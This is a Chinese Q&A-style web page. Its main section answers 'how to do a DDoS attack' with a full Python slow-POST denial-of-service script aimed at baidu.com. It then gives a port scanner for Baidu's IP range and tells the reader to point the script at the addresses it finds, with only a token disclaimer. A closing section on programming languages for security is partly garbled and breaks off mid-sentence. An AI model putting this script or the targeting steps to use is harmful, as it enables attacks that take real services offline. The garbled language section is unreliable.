本文目录一览：

• 1、怎么用python做一个简单的定时ddos攻击代码？

• 2、如何进行DDOS攻击怎么做

• 3、跨站脚本攻击漏洞需要用到什么编程语言

怎么用python做一个简单的定时ddos攻击代码？

你想干嘛呢

如果基本库不了解就去做这些技术不会有长进的눈_눈

如何进行DDOS攻击怎么做

会Python吗？下一个Python3.7.0-3.7.3,把代码复制下，粘贴即可

代码：

import socket

import time

import threading

#Pressure Test,ddos tool

MAX_CONN=20000

PORT=80

HOST="baidu.com"#在双引号里输入对方IP或域名，要保证他联网了或开机了，这里拿百度做示范（别运行！不然后果自负！！）

PAGE="/index.php"

buf=("POST %s HTTP/1.1\r\n"

"Host: %s\r\n"

"Content-Length: 10000000\r\n"

"Cookie: dklkt_dos_test\r\n"

"\r\n" % (PAGE,HOST))

socks=[]

def conn_thread():

  global socks

  for i in range(0,MAX_CONN):

      s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

      try:

          s.connect((HOST,PORT))

          s.send(buf.encode())

          print ("Send buf OK!,conn=%d\n"%i)

          socks.append(s)

      except Exception as ex:

          print ("Could not connect to server or send error:%s"%ex)

          time.sleep(10)

#end def

def send_thread():

  global socks

  while True:

      for s in socks:

          try:

              s.send("f".encode())

              #print "send OK!"

          except Exception as ex:

              print ("Send Exception:%s\n"%ex)

              socks.remove(s)

              s.close()

      time.sleep(1)

#end def

conn_th=threading.Thread(target=conn_thread,args=())

send_th=threading.Thread(target=send_thread,args=())

conn_th.start()

send_th.start()

如果你要攻击网站，以上代码虽然可行，但是，攻击效果很不好。

所以，更好用Windows里的PING进行检测

操作：

在Windows搜索栏里输入：cmd

输入：

ping -n 10 -l 1 baidu.com

//这里拿百度做示范，别真打百度！

那么，就会发现，系统反映了：

正在 Ping baidu.com [39.156.69.79] 具有 1 字节的数据:

来自 39.156.69.79 的回复: 字节=1 时间=27ms TTL=52

来自 39.156.69.79 的回复: 字节=1 时间=26ms TTL=52

来自 39.156.69.79 的回复: 字节=1 时间=27ms TTL=52

来自 39.156.69.79 的回复: 字节=1 时间=27ms TTL=52

来自 39.156.69.79 的回复: 字节=1 时间=27ms TTL=52

来自 39.156.69.79 的回复: 字节=1 时间=27ms TTL=52

来自 39.156.69.79 的回复: 字节=1 时间=29ms TTL=52

来自 39.156.69.79 的回复: 字节=1 时间=26ms TTL=52

来自 39.156.69.79 的回复: 字节=1 时间=27ms TTL=52

来自 39.156.69.79 的回复: 字节=1 时间=27ms TTL=52

39.156.69.79 的 Ping 统计信息:

  数据包: 已发送 = 10，已接收 = 10，丢失 = 0 (0% 丢失)，

往返行程的估计时间(以毫秒为单位):

  最短 = 26ms，最长 = 29ms，平均 = 27ms

说明，百度的服务器有一个主服务器是39.156.69.79

那么，就来查找百度的所有服务器吧！

输入以下代码：

#绝大多数成功的 *** 攻击都是以端口扫描开始的，在 *** 安全和黑客领域，端口扫描是经常用到的技术，可以探测指定主机上是否

#开放了指定端口，进一步判断主机是否运行了某些重要的 *** 服务，最终判断是否存在潜在的安全漏洞，从一定意义上将也属于系统运维的范畴

#端口扫描器程序:模拟端口扫描器的工作原理，并采用多进程技术提高扫描速度

import socket

import sys

import multiprocessing

import time as t

def ports(ports_serve):

  #获取常用端口对应的服务名称

  for port in list(range(1,100))+[143,145,113,443,445,3389,8080]:

      try:

          ports_serve[port]=socket.getservbyport(port)

      except socket.error:

          pass

def ports_scan(host,ports_service):

  ports_open=[]

  try:

      sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

      #超时时间的不同会影响扫描结果的精确度

      socket.timeout(0.01)

  except socket.error:

      print('socket creation error')

      sys.exit()

  for port in ports_service:

      try:

          #尝试连接指定端口

          sock.connect((host,port))

          #记录打开的端口

          ports_open.append(port)

          sock.close()

      except socket.error:

          pass

  return ports_open

if __name__ == '__main__':

  m=multiprocessing.Manager()

  ports_service=dict()

  results=dict()

  ports(ports_service)

  #创建进程池，允许最多8个进程同时运行

  pool = multiprocessing.Pool(processes=8)

  net = '39.156.69.'#后面的IP少一个，因为要扫描这段区域内的IP，从而进行攻击

  for host_number in map(str,range(8,10)):

      host = net + host_number

      #创建一个新进程，同时记录其运行结果

      results[host] = pool.apply_async(ports_scan,(host,ports_service))

      print('starting '+host+'...')

  #关闭进程池，close()必须在join()之前调用

  pool.close()

  #等待进程池中的进程全部执行结束

  pool.join()

  #打印输出结果

  for host in results:

      print('='*30)

      print(host,'.'*10)

      for port in results[host].get():

          print(port,':',ports_service[port])

你会发现，Python反映了：

starting 39.156.69.8...

starting 39.156.69.9...

//并不是指百度只有这两个服务器！而是我们目前只能扫描到两个！

接着，运行DDoS攻击程序，把IP分别改为39.156.69.8和39.156.69.9

就可以实现DDoS攻击了。

//注：请不要用于违法用途，并且不要随意进行攻击。如想使用，可攻击虚拟机，但不要攻击外网IP和域名！！！

跨站脚本攻击漏洞需要用到什么编程语言

这里有5种编程语言，可以对 *** 安全的问题有所帮助。

C和C++

如果是在 *** 安全领域，C和C++是相对重要的最基础的编程语言，这些语言提供了对底层IT基础设施(如RAM和系统进程)的访问，如果保护不好，黑客可以很容易地利用这些基础设施。

C编程语言是大多数操作系统的主干。它是一种简洁、灵活和高效的语言，可用于完成多种任务，如加密、图像处理和socket *** 。

从本质上讲，C++通常被认为是C的大哥，它是由crack、meth和steroids混合编译而成的。而C++是一种主要基于C的源代码的很棒的语言。有几个使用C++创建的 *** 安全程序。例如，Network Mapper，就是是用C+创建的。

下面是C+的创建者Bjarne Stroustrup的一句话：

"C使你很容易射中自己的脚；C+使它变得更难，但当你这样做时，它会把你的整个腿都炸掉。"

如果你具有使用C/C++编程语言的经验，你将知道如何应对针对计算环境中较低级别操作的攻击。

PYTHON

作为一种高级编程语言，Python越来越受到 *** 专家的欢迎。它之所以吸引人，主要是因为它代码的可读性、语法清晰和简单，以及大量库的可用性。

因此，无论你想做什么任务，你都可以使用Python轻松完成任务。例如，你可以使用该语言将TCP数据包发送到计算机，执行恶意软件分析，并创建入侵检测系统，而对第三方工具的依赖性最小。

然而，与C/C++不同，Python并不是底层的；因此，它可能无法为提供足够硬件资源可见性。

学习Python用于 *** 安全将使你在职业生涯中占据优势。你将具备编程技能，可以帮助你识别漏洞并发现如何解决它们。

JAVASCRIPT

JavaScript是一种高级编程语言，通常被称为Web的“通用语言”。JavaScript是支持Internet的核心技术。首先，它是为网页添加交互性的语言。尽管JavaScript最初仅在Web浏览器的客户端实现，但现在可以在其他类型的主机基础结构中使用该语言，例如数据库中的服务器端和PDF程序等离线应用程序。

因此，由于它的广泛使用，学习JavaScript可以让你比黑客领先一步。 你将了解网站和其他应用程序如何工作的概念以及用于抵御恶意用户的更佳设计。例如，跨站点脚本是一种基于JavaScript的攻击，涉及攻击者在Web应用程序中植入恶意代码。

如果你有使用JavaScript编程语言的经验，则可以防止发生此类攻击。

PHP

PHP是用于开发网站的服务器端编程语言。由于大多数网站都是使用PHP创建的，因此学习该语言可以让你了解如何抵御入侵者。

例如，DDoS（拒绝服务）攻击通常会尝试使Web应用程序对预期用户不可用。

借助PHP编程知识，再加上JavaScript等其他技术的技能，你可以实现可靠的解决方案来保护Web应用程序。

SQL

SQL（结构化查询语言）主要用于管理存储在数据库中的数据。由于当前数据存储系统的爆炸式增长，SQL被广泛用于维护和检索数据。

同样，黑客越来越多地编排语言来破坏或泄露存储的数据。例如，SQL注入攻击涉及利用SQL漏洞来窃取或修改数据库中保存的数据。因此，充分了解SQL语言对于 *** 安全至关重要。

总结

以上并不是 *** 安全更佳编程语言的详尽列表。根据你的具体用例，你可能会发现一种语言比其他语言更适合你的工作。

例如，如果你想专注于保护Web应用程序的前端，那么学习JavaScript可能是你理想的选择。

尽管如此，要成为一个全面的 *** 极客，你需要采用